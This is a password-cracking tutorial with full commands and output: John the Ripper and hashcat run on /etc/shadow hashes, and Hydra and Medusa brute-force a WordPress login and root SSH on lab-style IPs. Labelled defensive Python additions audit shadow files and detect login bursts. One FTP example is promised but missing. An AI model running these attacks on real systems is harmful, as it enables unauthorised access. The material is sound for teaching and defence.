Table of Contents
- Types of attacks
- Password Cracking Strategy
- Other Password Cracking Tools
Passwords are the most widely used form of authentication in the world. A username and password are used to log in to your social media accounts, banks, and so on.
Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to try guesses for the password and check each one against an available cryptographic hash of the password. This process is often called a brute-force attack.
In general, passwords are not stored in clear text. Instead, they are stored as hashes. Hashes, or hash values, are the values returned by a hash function, which maps data of arbitrary size to data of fixed size.
Types of attacks
Dictionary Attack
A dictionary attack is the simplest and fastest password cracking attack. The implementation simply runs through a dictionary of words, trying each one to see if it works. The attack is practical because modern computers can test candidates at a very high rate. It is usually the first approach to password cracking.
Rainbow Table Attacks
Mostly, passwords are not stored in plaintext; they are stored in the form of a hash. Hence, even if the attacker dumps the password database, all they get is the hash value of each password, which cannot be used directly to authenticate. One way to recover the password is to take the dictionary file, hash each word and compare it to the stored hash. But this is very time consuming. A faster approach is to use a table in which every word in the dictionary has already been hashed, and look the stored hash up in that table. This type of attack is called a Rainbow Table Attack.
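To make the lookup-table idea concrete, here is a small Python example added to this section (it is not code from the original article). It precomputes hashes for a constructed mini wordlist, recovers an unsalted hash with a single dictionary lookup, and then shows why the same table is useless once each stored hash carries a per-user random salt. The wordlist, the choice of SHA-256 and the salt$hash storage format are assumptions made for illustration.

```python
import hashlib
import hmac
import os

# Constructed mini wordlist standing in for a real dictionary file (assumption).
WORDLIST = ["123456", "password", "toor", "letmein", "qwerty", "billy"]
ALGORITHM = "sha256"  # fast general-purpose hash, chosen here only for illustration


def build_lookup_table(words, algorithm=ALGORITHM):
    """Precompute hash -> plaintext for every word: the idea behind a lookup/rainbow table.
    The expensive hashing is done once, up front; each later lookup is O(1)."""
    return {hashlib.new(algorithm, w.encode()).hexdigest(): w for w in words}


def lookup(table, stored_hash):
    """Recover the plaintext of an UNSALTED hash if its word is in the table, else None."""
    return table.get(stored_hash)


def hash_with_salt(password, salt=None, algorithm=ALGORITHM):
    """Store as 'salt$hash' (format assumed for this example). A fresh random salt per
    user means two users with the same password get different hashes, and a table
    precomputed without the salt never matches."""
    if salt is None:
        salt = os.urandom(16).hex()
    digest = hashlib.new(algorithm, (salt + password).encode()).hexdigest()
    return f"{salt}${digest}"


def verify_salted(password, stored, algorithm=ALGORITHM):
    """Recompute with the stored salt and compare in constant time."""
    salt, digest = stored.split("$", 1)
    candidate = hashlib.new(algorithm, (salt + password).encode()).hexdigest()
    return hmac.compare_digest(candidate, digest)


def demo():
    table = build_lookup_table(WORDLIST)
    # Unsalted storage: one dictionary lookup recovers the password.
    unsalted = hashlib.new(ALGORITHM, b"toor").hexdigest()
    hit = lookup(table, unsalted)                     # "toor"
    # Salted storage of the same password: the precomputed table has no entry for it.
    stored = hash_with_salt("toor")
    miss = lookup(table, stored.split("$", 1)[1])     # None
    return hit, miss


if __name__ == "__main__":
    print(demo())
```

Salting only defeats precomputation: an attacker who obtains the salt alongside the hash can still run the dictionary attack from the previous paragraph against that one hash, which is why password stores use deliberately slow, salted constructions rather than a single fast hash.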
Brute-force Attack
This is the most time-consuming approach and should be your last resort for cracking a password. A brute-force attack tries every possible combination of letters, numbers and special characters that could form a password. Hence, this technique requires a lot of computing power.
Password Cracking Strategy
Expert password crackers have a strategy. They don’t expect to be able to crack every password, but with a well-developed strategy, they can crack most passwords in a very short amount of time.
John the Ripper
John the Ripper is one of the best-known password cracking tools. It is a command-line tool for Linux only, which is why it is a fast cracker. One of the beauties of this tool is its built-in default cracking strategy.
First, it attempts a dictionary attack; if that fails, it tries combined dictionary words, then a hybrid attack of dictionary words with special characters and numbers, and only if all of those fail does it resort to a brute-force attack.
root@kali:~# unshadow passwd shadow > unshadowed.txt
root@kali:~# john --wordlist=/usr/share/john/password.lst --rules unshadowed.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Loaded 1 password hash (sha512crypt [64/64])
toor             (root)
guesses: 1  time: 0:00:00:07 DONE (Mon May 19 08:13:05 2014)  c/s: 482  trying: 1701d - andrew
Use the "--show" option to display all of the cracked passwords reliably
Hashcat
Hashcat is claimed to be the fastest password recovery tool. Examples of hashing algorithms supported by hashcat are Microsoft LM hashes, MD4, MD5, the SHA family, Unix crypt formats, MySQL and Cisco PIX.
Core attack types
- Dictionary Attack: trying all words in a list; also called straight mode (attack mode 0, -a 0)
- Combinator Attack: concatenating words from multiple wordlists (mode 1)
- Brute-force Attack and Mask Attack: trying all characters from given charsets, per position (mode 3)
- Hybrid Attack: combining wordlists + masks (mode 6) and masks + wordlists (mode 7)
Generic hash types
To crack the password
- Grab the hashes
One way to get the hashes is to take them from the /etc/shadow file.
On this system the hashes use the SHA-512 crypt algorithm, which is recognisable by the $6$ prefix at the start of each hash.
- Choose your wordlist
There are many wordlists available. To find the wordlists available, type the command
root@kali:/# locate wordlist
- Crack the hashes
Now that we know the hash type, we are ready to crack the hashes. First, let's put the hashes into a file that can be used for cracking; we will call it hash.lst.
To prepare this file for cracking, we need to remove everything except the hashes. Each line of the /etc/shadow file holds the username, then the salted hash, and then information about the password policy that applies to that user. We need to strip all of that, leaving just the hash.
Each line of this file starts with the username, e.g. "user1", "user2", etc. Open the file in your favorite text editor and delete the username and the colon that follows it. Then go to the end of the line and remove everything after the hash, starting at the next colon (:). The result is a file containing only the hashes and nothing else.
The final step is to crack the hash. This is the command used to crack the above hash:
kali > hashcat -m 1800 -a 0 -o plaintext.txt --remove hash.lst /usr/share/sqlmap/txt/wordlist.txt
| Flag / argument | Meaning |
|---|---|
| -m 1800 | Type of hash (SHA-512 crypt) |
| -a 0 | Attack mode 0 (straight/dictionary) |
| -o plaintext.txt | Output file for the cracked passwords |
| --remove | Remove each hash from the input file after it has been cracked |
| hash.lst | Input file of hashes |
| /usr/share/sqlmap/txt/wordlist.txt | Path to the wordlist for the attack |
Now, open the plaintext.txt file to view our cracked passwords!
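The manual editing described in the steps above (strip the username and the policy fields, keep only the hash) is easy to get wrong on a large file, and the same pass over /etc/shadow is also a useful audit. The Python example below is added here and is not part of the original article: it parses constructed shadow lines, selects the hash fields for one crypt scheme, maps the scheme to the hashcat -m value, and reports accounts with an empty password field or a legacy md5crypt hash. The sample lines are constructed and their hash bodies are PLACEHOLDER strings, not real digests.

```python
import re

# Constructed /etc/shadow content. The hash bodies are PLACEHOLDER strings, not real digests;
# the nine colon-separated fields follow the real shadow(5) layout.
SAMPLE_SHADOW = """\
root:$6$saltsalt$PLACEHOLDER_SHA512_ROOT:19000:0:99999:7:::
user1:$6$abcdefgh$PLACEHOLDER_SHA512_USER1:19000:0:99999:7:::
user2:$1$legacy12$PLACEHOLDER_MD5CRYPT:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
guest::19000:0:99999:7:::
sshd:!:19000:0:99999:7:::
"""

# crypt(3) scheme id -> (name, hashcat -m value). 1800 is the mode used in this section;
# the others are the standard identifiers and their documented hashcat modes.
CRYPT_SCHEMES = {
    "1": ("md5crypt", 500),
    "5": ("sha256crypt", 7400),
    "6": ("sha512crypt", 1800),
}


def parse_shadow(text):
    """Return [(username, password_field), ...]; reject lines without the 9 shadow fields."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError(f"malformed shadow line: {line!r}")
        entries.append((fields[0], fields[1]))
    return entries


def classify(password_field):
    """'empty' (no password), 'locked' ('!' or '*'), the $id$ scheme, or 'unknown'."""
    if password_field == "":
        return "empty"
    if password_field.startswith(("!", "*")):
        return "locked"
    m = re.match(r"^\$([^$]+)\$", password_field)
    return m.group(1) if m else "unknown"


def extract_hashes(text, scheme="6"):
    """Bare hash fields for one scheme: what the manual editing above produces for hash.lst."""
    return [field for _, field in parse_shadow(text) if classify(field) == scheme]


def hashcat_mode(scheme):
    """hashcat -m value for a crypt scheme id, or None if it is not in the table."""
    name_mode = CRYPT_SCHEMES.get(scheme)
    return name_mode[1] if name_mode else None


def audit(text):
    """Defender's view of the same file: accounts that need attention before anyone cracks them."""
    findings = []
    for user, field in parse_shadow(text):
        kind = classify(field)
        if kind == "empty":
            findings.append((user, "empty password field"))
        elif kind == "1":
            findings.append((user, "md5crypt hash: legacy scheme, rehash on next login"))
    return findings


if __name__ == "__main__":
    hashes = extract_hashes(SAMPLE_SHADOW)
    print(f"{len(hashes)} sha512crypt hashes -> hashcat -m {hashcat_mode('6')}")
    for user, note in audit(SAMPLE_SHADOW):
        print(f"{user}: {note}")
```

Writing the list returned by extract_hashes one per line gives exactly the hash.lst that the hashcat command above expects, and the -m value comes from hashcat_mode instead of being remembered by hand.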
Hydra
Hydra is a parallelized login cracker which supports numerous protocols. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.
Supported protocols:
Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
The following snippet shows how to brute-force an FTP login with the username admin and the password wordlist password.lst.
Check the line beginning with [ftp].
It shows the username/password combination that worked for the FTP server. Quite easy!
Let’s see how we can use Hydra to brute-force HTTP form using POST request.
root@kali:~# hydra -l elliot -P fsocity.dic.uniq 10.10.10.129 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect' -t 64
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-03 13:11:57
[DATA] max 64 tasks per 1 server, overall 64 tasks, 11452 login tries (l:1/p:0), ~11452 tries per task
[DATA] attacking http-post-form://10.10.10.129:80//wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect
[STATUS] 2084.00 tries/min, 2084 tries in 00:00h, 0 to do in 01:00h, 9368 active
[http-post-form] host: 10.10.10.129   login: elliot   password: ER28-0652
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 64 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-03 13:13:57
The module option '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect' is made up of three colon-separated parts: the path of the login page, the POST parameters sent to the form, and the failure condition (F=is incorrect, the string that appears in the response when a login fails).
The placeholders ^USER^ and ^PASS^ mark which parameters receive the username and the password on each attempt.
Some of the flags used for Hydra:
| Flag | Meaning |
|---|---|
| -t | Number of parallel threads (tasks per target) |
| -l | A single username |
| -L | Provide a wordlist for usernames |
| -P | Provide a wordlist for passwords |
| http-post-form | Use an HTTP POST request (form login) |
| https-post-form | Use an HTTPS POST request (form login) |
| F= | A string contained in the failure message |
Medusa
Medusa is a speedy, parallel and modular login brute-forcer. The goal is to support as many services that allow remote authentication as possible. The author considers the following items to be some of the key features of this application:
- Thread-based parallel testing
- Flexible user input
- Modular design
- Multiple protocols supported (SMB, HTTP, POP3, MS-SQL, SSHv2)
Supported modules:
AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN), Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic Wrapper, Web Form
Some of the flags used:
| Flag | Meaning |
|---|---|
| -h | Target hostname or IP address |
| -U | Read target usernames from a wordlist file |
| -P | Read target passwords from a wordlist file |
| -O | Write the log to a file |
| -M | Module to execute (without the .mod extension) |
| -n | Use a non-default TCP port number |
| -t | Number of threads for concurrent logins |
| -v | Verbosity level (0 - 6); the default is 5 |
Example of medusa to brute-force SSH login
# medusa -u root -P 500-worst-passwords.txt -h 10.10.10.10 -M ssh
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (1 of 500 complete)
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: password (2 of 500 complete)
<< --- SNIP --->>>
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: billy (498 of 500 complete)
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: toor (499 of 500 complete)
ACCOUNT FOUND: [ssh] Host: 10.10.10.10 User: root Password: toor [SUCCESS]
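From the defender's side, both runs shown in this article leave an obvious trail: the Hydra output above reports about 2,000 POST requests a minute to /wp-login.php, and the Medusa run sends 500 passwords against one SSH account. The Python example below is added here and is not part of the original article. It parses constructed Apache/nginx access-log lines and sshd auth-log lines and flags any source address that reaches five failed attempts within a 60-second window. The log samples, the addresses (taken from the RFC 5737 documentation ranges) and the threshold are constructed for illustration; the rule that WordPress answers a failed login with status 200 and a successful one with a 302 redirect is the heuristic used to tell the two apart in the web log.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed log samples. Addresses come from the RFC 5737 documentation ranges.
# Combined-format access log: one WordPress login guess every two seconds from
# 192.0.2.10 (a failed login re-renders the form with status 200), plus one successful
# login (302 redirect) and an unrelated GET from another client.
WEB_LOG = [
    f'192.0.2.10 - - [03/Jan/2018:13:11:{s:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 3134 "-" "Mozilla/5.0"'
    for s in range(0, 16, 2)
] + [
    '203.0.113.5 - - [03/Jan/2018:13:11:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [03/Jan/2018:13:11:09 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

# sshd lines as written to auth.log: six failures for root from 198.51.100.7 within
# eleven seconds, one stray failure from another address, and a normal key-based login.
SSH_LOG = [
    f"Jan  3 13:20:{s:02d} web01 sshd[41{s:02d}]: Failed password for root from 198.51.100.7 port 5{s:04d} ssh2"
    for s in range(1, 13, 2)
] + [
    "Jan  3 13:20:30 web01 sshd[4200]: Failed password for invalid user admin from 198.51.100.8 port 50001 ssh2",
    "Jan  3 13:20:31 web01 sshd[4201]: Accepted publickey for deploy from 198.51.100.9 port 50002 ssh2",
]

WEB_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "POST /wp-login\.php[^"]*" (\d{3})')
SSH_RE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for (?:invalid user )?\S+ from (\S+)"
)


def parse_web_line(line):
    """(source_ip, timestamp) for a failed WordPress login POST (status 200), else None."""
    m = WEB_RE.match(line)
    if not m or m.group(3) != "200":
        return None
    return m.group(1), datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")


def parse_ssh_line(line, year=2018):
    """(source_ip, timestamp) for an sshd 'Failed password' line, else None.
    Syslog timestamps carry no year, so the caller supplies it."""
    m = SSH_RE.match(line)
    if not m:
        return None
    stamp = " ".join(m.group(1).split())  # collapse the double space in 'Jan  3'
    return m.group(2), datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")


def detect_bursts(events, threshold, window_seconds):
    """Sliding window per source: {ip: peak_count} for every source that reaches
    `threshold` failures inside some `window_seconds` span. At Hydra's reported
    2084 tries/min a 5-in-60-seconds rule fires almost immediately."""
    by_ip = defaultdict(list)
    for ip, ts in events:
        by_ip[ip].append(ts)
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[ip] = max(count, flagged.get(ip, 0))
    return flagged


def scan_web(lines, threshold=5, window_seconds=60):
    return detect_bursts([e for e in map(parse_web_line, lines) if e], threshold, window_seconds)


def scan_ssh(lines, threshold=5, window_seconds=60):
    return detect_bursts([e for e in map(parse_ssh_line, lines) if e], threshold, window_seconds)


if __name__ == "__main__":
    print("web form brute force:", scan_web(WEB_LOG))
    print("ssh brute force:", scan_ssh(SSH_LOG))
```

The two parsers feed the same window logic, so adding another service means adding one regex, not another detector. Keep in mind that a tool running with many parallel tasks (Hydra's -t 64 above) produces its whole burst in seconds, so the window matters less than simply counting failures per source address.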
Other Password Cracking Tools
There are many more password cracking tools available. Every tool has its pros and cons. Some of the other tools available are: